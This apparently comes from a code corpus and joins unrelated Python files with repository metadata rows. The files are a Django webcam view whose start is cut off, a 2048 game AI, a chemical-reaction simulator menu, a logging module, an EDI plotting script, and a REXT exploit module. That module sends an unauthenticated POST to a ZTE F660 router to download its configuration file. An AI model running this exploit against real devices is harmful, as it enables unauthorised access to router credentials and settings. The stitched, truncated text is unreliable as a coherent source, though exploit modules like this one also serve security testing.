from django.conf import settings
from cam.models import WebCam, is_file_image
logger = logging.getLogger(__name__)
def get_snapshot(request):
"Take a webcam snapshot and return it as HTTP response"
content_type = 'application/json'
body = json.dumps('Failed snapshot')
# Try every available WebCam object to take the snapshot,
# until the first one that succeeds
for cam in WebCam.objects.all().order_by('priority'):
logger.debug('Attempting saveSnapshot with %s' % (cam))
snapshot_file = cam.saveSnapshot()
if snapshot_file and is_file_image(snapshot_file):
content_type, _ = guess_type(snapshot_file)
if content_type:
body = open(snapshot_file, 'rb').read()
break
else:
content_type = 'application/json'
return HttpResponse(body, content_type=content_type)
| apache-2.0 | -4,536,109,680,444,750,300 | 33.133333 | 63 | 0.668945 | false | 4.129032 | false | false | false |
lucasdnd/2048-ai | ai.py | 1 | 2810 | import random
class _AI:
def get_command_letter(self, command):
if command == 0:
return "w"
elif command == 1:
return "a"
elif command == 2:
return "s"
else:
return "d"
class RandomAI(_AI):
def __init__(self):
self.name = "random_ai"
def get_next_command(self, available_commands):
self.current_command = random.randint(0, 3)
return self.get_command_letter(self.current_command)
class DirectionAI(_AI):
def __init__(self):
self.name = "direction_ai"
def get_next_command(self, available_commands):
if available_commands["s"]: # Prefer "down" movements
return "s"
elif available_commands["a"]: # Then "left"
return "a"
elif available_commands["d"]: # Then "right"
return "d"
else: # Only move "up" if no others are available
return "w"
class PairCheckAI(_AI):
def __init__(self):
self.name = "pair_check_ai"
self.direction_points = {"w": 0, "a": 0, "s": 0, "d": 0}
def get_next_command(self, available_commands):
# Check which direction to move
# print("calculating points for board:")
h_points = self.calc_points(self.board)
rotated_board = self.rotate_board(self.board)
v_points = self.calc_points(rotated_board)
# No points, return a random direction
if h_points == 0 and v_points == 0:
# print("nothing, random movement")
return self.get_command_letter(random.randint(0, 3))
# print("h: " + str(h_points))
# print("v: " + str(v_points))
# Up/down and left/right scores are the same
self.direction_points["w"] = v_points
self.direction_points["a"] = h_points
self.direction_points["s"] = v_points
self.direction_points["d"] = h_points
dir_letter = max(self.direction_points, key=self.direction_points.get)
# print("moving: " + dir_letter)
return dir_letter
def update_board(self, board):
self.board = board
# Calculates the number of points in each row
def calc_points(self, board):
# self.print_board(board)
total_score = 0
for row in board:
score = 0
for n in row:
if n == 0:
pass
elif score == 0:
score = n
elif score != n:
score = n
elif score == n:
# will_score = True
score *= 2
total_score += score
score = 0
return total_score
# Rotates the board
def rotate_board(self, board):
row_size = len(board)
board_size = row_size ** 2
rotated = []
for i in range(0, row_size):
rotated.append([])
for i in range(0, board_size):
rotated[i / row_size].append(board[i % row_size][i / row_size])
return rotated
def print_board(self, board):
for i in board:
print(i)
| gpl-2.0 | -3,631,155,268,515,528,700 | 24.779817 | 77 | 0.588968 | false | 3.431013 | false | false | false |
j91321/rext | modules/exploits/zte/f660_config_download.py | 1 | 2035 | # Name:ZTE F660 remote config download
# File:f660_config_download.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 25.12.2015
# Last modified: 25.12.2015
# Shodan Dork:
# Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
# Based on: https://www.exploit-db.com/exploits/36978/
import core.Exploit
import core.io
import requests
from interface.messages import print_error, print_success, print_warning, print_info
class Exploit(core.Exploit.RextExploit):
"""
Name:ZTE F660 remote config download
File:f660_config_download.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 25.12.2015
Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
Based on: https://www.exploit-db.com/exploits/36978/
Options:
Name Description
host Target host address
port Target port
"""
def __init__(self):
core.Exploit.RextExploit.__init__(self)
def do_run(self, e):
url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
try:
print_warning("Sending exploit")
# It took me longer than necessary to find out how to use Content-Disposition properly
# Always set stream=True otherwise you may not get the whole file
response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
if response.status_code == 200:
if response.headers.get('Content-Disposition'):
print_success("got file in response")
print_info("Writing file to config.bin")
core.io.writefile(response.content, "config.bin")
print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
Exploit()
| gpl-3.0 | -4,303,776,654,742,305,000 | 35.232143 | 107 | 0.663381 | false | 3.547203 | true | false | false |
aayushkapadia/chemical_reaction_simulator | MainFrame.py | 1 | 3865 | import ReactionMaker.inversion as inversion
import ReactionMaker.duplicate as duplicate
import ReactionMaker.increment as increment
import ReactionMaker.decrement as decrement
import ReactionMaker.multiply as multiply
import ReactionMaker.logarithm as logarithm
import ReactionMaker.power as power
import Simulator.XMLParser as XMLParser
def getHistoryFileName(xmlFileName):
y = xmlFileName[:-3]
return 'history_' + y + 'txt'
def printWelcomeMessage():
print "Welcome to the Chemical Computer world!!"
def executeInversion():
var = raw_input("Enter the value you want to invert: ")
return inversion.execute(var)
def executeDuplicate():
var = raw_input("Enter the value you want to duplicate: ")
return duplicate.execute(var)
def executeDecrement():
var = raw_input("Enter the value you want to decrement: ")
return decrement.execute(var)
def executeIncrement():
var = raw_input("Enter the value you want to increment: ")
return increment.execute(var)
def executeMultiply():
input1 = raw_input("Enter the value of input 1: ")
input2 = raw_input("Enter the value of input 2: ")
return multiply.execute(input1,input2)
def executeLogarithm():
var = raw_input("Enter the value you want to take logarithm of: ")
return logarithm.execute(var)
def executePower():
input1 = raw_input("Enter the value of base: ")
input2 = raw_input("Enter the value of exponent: ")
return power.execute(input1,input2)
def showMainMenu():
print "Enter your choice here: "
print "1: Basic Functions"
print "2: Advanced Functions"
print "3: Exit"
def showBasicFunctionsMenu():
print "Select any one of the below basic function"
print "1: Inversion"
print "2: Duplication/Copy"
print "3: Decrementation"
print "4: Incrementation"
def showAdvancedFunctionsMenu():
print "Select any one of the below advanced function"
print "1: Multiplication"
print "2: Logarithm"
print "3: Power"
def showInvalidMessageAndQuit():
print "Please select only one of the given choice"
print "Quitting the Chemical World ..."
quit()
def plotResults(xmlFile,chemicalList,timeOfSimulation):
historyFile = getHistoryFileName(xmlFile)
sim = XMLParser.getSimulator(xmlFile)
sim.simulate(timeOfSimulation,historyFile)
sim.plot(chemicalList)
def executeBasicFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeInversion()
elif userChoice == 2:
outputFileName,chemicalList = executeDuplicate()
elif userChoice == 3:
outputFileName,chemicalList = executeDecrement()
elif userChoice == 4:
outputFileName,chemicalList = executeIncrement()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeAdvancedFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeMultiply()
elif userChoice == 2:
outputFileName,chemicalList = executeLogarithm()
elif userChoice == 3:
outputFileName,chemicalList = executePower()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeUserChoice(userChoice):
if userChoice == 1:
showBasicFunctionsMenu()
userChoice = int(input())
executeBasicFunction(userChoice)
elif userChoice == 2:
showAdvancedFunctionsMenu()
userChoice = int(input())
executeAdvancedFunction(userChoice)
elif userChoice == 3:
print "Quitting the Chemical World ..."
quit()
else:
showInvalidMessageAndQuit()
def main():
printWelcomeMessage()
while True:
print ""
showMainMenu()
userChoice = int(input())
executeUserChoice(userChoice)
main() | mit | 6,386,970,407,418,349,000 | 26.614286 | 67 | 0.760155 | false | 3.375546 | false | false | false |
mariomosca/damnvid | dLog.py | 12 | 2690 | # -*- coding: utf-8 -*-
import os, sys
import time
import traceback
from dCore import *
class DamnLog:
def __init__(self, logpath=None, stderr=True, flush=False, handleerrors=True, overrides={}):
DamnLog.instance = self
self.time = 0
self.streams = []
self.autoflush = flush
self.overrides = {}
if logpath is not None:
try:
if not os.path.exists(os.path.dirname(logpath)):
os.makedirs(os.path.dirname(logpath))
f = DamnOpenFile(logpath, 'wb')
self.streams.append(f)
f.write((self.getPrefix() + u'Log opened.').encode('utf8'))
except:
try:
print 'Warning: Couldn\'t open log file!'
traceback.print_exc()
except:
pass
if stderr:
self.streams.append(sys.stdout)
if handleerrors:
try:
sys.excepthook = self.logException
except:
self.log('!! Cannot override excepthook. This looks bad.')
def getPrefix(self):
t = int(time.time())
if self.time != t:
self.time = t
return u'[' + DamnUnicode(time.strftime('%H:%M:%S')) + u'] '
return u''
def write(self, message):
message = u'\r\n' + (self.getPrefix() + DamnUnicode(message.strip())).strip()
for s in self.streams:
try:
print >> s, message.encode('utf8'),
except:
try:
print 'Could not print to stream', s,'message:', message.strip()
except:
pass
if self.autoflush:
self.flush()
def log(self, *args):
import dCore
s = []
for i in args:
i = dCore.DamnUnicode(i)
for k in self.overrides.iterkeys():
i = i.replace(k, self.overrides[k])
s.append(i)
return self.write(u' '.join(s))
def logException(self, typ, value, tb):
import traceback
import dCore
import dLog
try:
info = traceback.format_exception(typ, value, tb)
e = []
for i in info:
e.append(dCore.DamnUnicode(i).strip())
self.log('!!',u'\n'.join(e))
except:
try:
self.log('!! Error while logging exception. Something is very wrong.')
except:
pass # Something is very, very wrong.
def flush(self):
for s in self.streams:
try:
s.flush()
except:
pass
try:
os.fsync(s)
except:
pass
def close(self):
self.log('Closing log.')
for s in self.streams:
if s != sys.stderr:
try:
s.close()
except:
pass
def addOverride(target, replacement=u''):
self.overrides[DamnUnicode(target)] = DamnUnicode(replacement)
def Damnlog(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.log(*args)
return None
def DamnlogException(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.logException(*args)
return None
def DamnlogOverride(target, replacement=u''):
DamnLog.instance.addOverride(target, replacement)
| gpl-3.0 | -7,886,833,101,879,418,000 | 24.619048 | 93 | 0.646097 | false | 2.822665 | false | false | false |
MTgeophysics/mtpy | mtpy/uofa/simpleplotEDI.py | 1 | 3748 | #!/usr/bin/env python
import os
import sys
import os.path as op
import mtpy.core.edi as MTedi
def main():
fn = sys.argv[1]
if not op.isfile(fn):
print('\n\tFile does not exist: {0}\n'.format(fn))
sys.exit()
saveplot = False
if len(sys.argv) > 2:
arg2 = sys.argv[2]
if 's' in arg2.lower():
saveplot = True
fn = plotedi(fn, saveplot)
def plotedi(fn, saveplot=False, component=None):
edi = MTedi.Edi()
try:
edi.readfile(fn)
except:
print('\n\tERROR - not a valid EDI file: {0}\n'.format(fn))
sys.exit()
# if saveplot is True:
# import matplotlib
# matplotlib.use('Agg')
import pylab
lo_comps = []
if component is not None:
'n' in component.lower()
try:
if 'n' in component.lower():
lo_comps.append('n')
except:
pass
try:
if 'e' in component.lower():
lo_comps.append('e')
except:
pass
if len(lo_comps) == 0:
lo_comps = ['n', 'e']
res_te = []
res_tm = []
phi_te = []
phi_tm = []
reserr_te = []
reserr_tm = []
phierr_te = []
phierr_tm = []
for r in edi.Z.resistivity:
res_te.append(r[0, 1])
res_tm.append(r[1, 0])
for p in edi.Z.phase:
phi_te.append(p[0, 1] % 90)
phi_tm.append(p[1, 0] % 90)
if pylab.np.mean(phi_te) > 90 and pylab.np.mean(phi_tm) > 90:
phi_te = [i % 90 for i in phi_te]
phi_tm = [i % 90 for i in phi_tm]
for r in edi.Z.resistivity_err:
reserr_te.append(r[0, 1])
reserr_tm.append(r[1, 0])
for p in edi.Z.phase_err:
phierr_te.append(p[0, 1])
phierr_tm.append(p[1, 0])
periods = 1. / edi.freq
resplotelement_xy = None
resplotelement_yx = None
axes = pylab.figure('EDI ' + fn)
ax1 = pylab.subplot(211)
if 'n' in lo_comps:
resplotelement_xy = pylab.errorbar(
periods, res_te, reserr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
resplotelement_yx = pylab.errorbar(
periods, res_tm, reserr_tm, marker='x', c='r', fmt='x')
pylab.xscale('log', nonposx='clip')
pylab.yscale('log', nonposy='clip')
minval = pylab.min(pylab.min(res_te, res_tm))
maxval = pylab.max(pylab.max(res_te, res_tm))
pylab.xlim(0.5 * pylab.min(periods), 2 * pylab.max(periods))
# ylim([0.1,100])
pylab.ylim([minval / 10, maxval * 10])
pylab.autoscale(False)
pylab.ylabel(r' $\rho$ (in $\Omega m$)')
pylab.setp(ax1.get_xticklabels(), visible=False)
# share x only
ax2 = pylab.subplot(212, sharex=ax1)
pylab.autoscale(False)
# ylim(-45,135)
if 'n' in lo_comps:
pylab.errorbar(periods, phi_te, phierr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
pylab.errorbar(periods, phi_tm, phierr_tm, marker='x', c='r', fmt='x')
pylab.ylabel('Phase angle ($\degree$)')
pylab.xlabel('Period (in s)')
pylab.plot([pylab.xlim()[0], pylab.xlim()[1]], [45, 45], '-.', c='0.7')
pylab.ylim([-0, 90])
ax1.legend([resplotelement_xy, resplotelement_yx], ['$E_{X}/B_Y$', '$E_Y/B_X$'], loc=2, ncol=1,
numpoints=1, markerscale=0.8, frameon=True, labelspacing=0.3,
prop={'size': 8}, fancybox=True, shadow=False)
pylab.tight_layout()
if saveplot is True:
pylab.ioff()
outfn = op.splitext(fn)[0] + '.png'
pylab.savefig(outfn, bbox_inches='tight')
pylab.close('all')
pylab.ion()
return outfn
else:
pylab.ion()
pylab.show(block=True)
return None
if __name__ == '__main__':
main()
| gpl-3.0 | 5,839,306,716,589,147,000 | 24.496599 | 99 | 0.534152 | false | 2.923557 | false | false | false |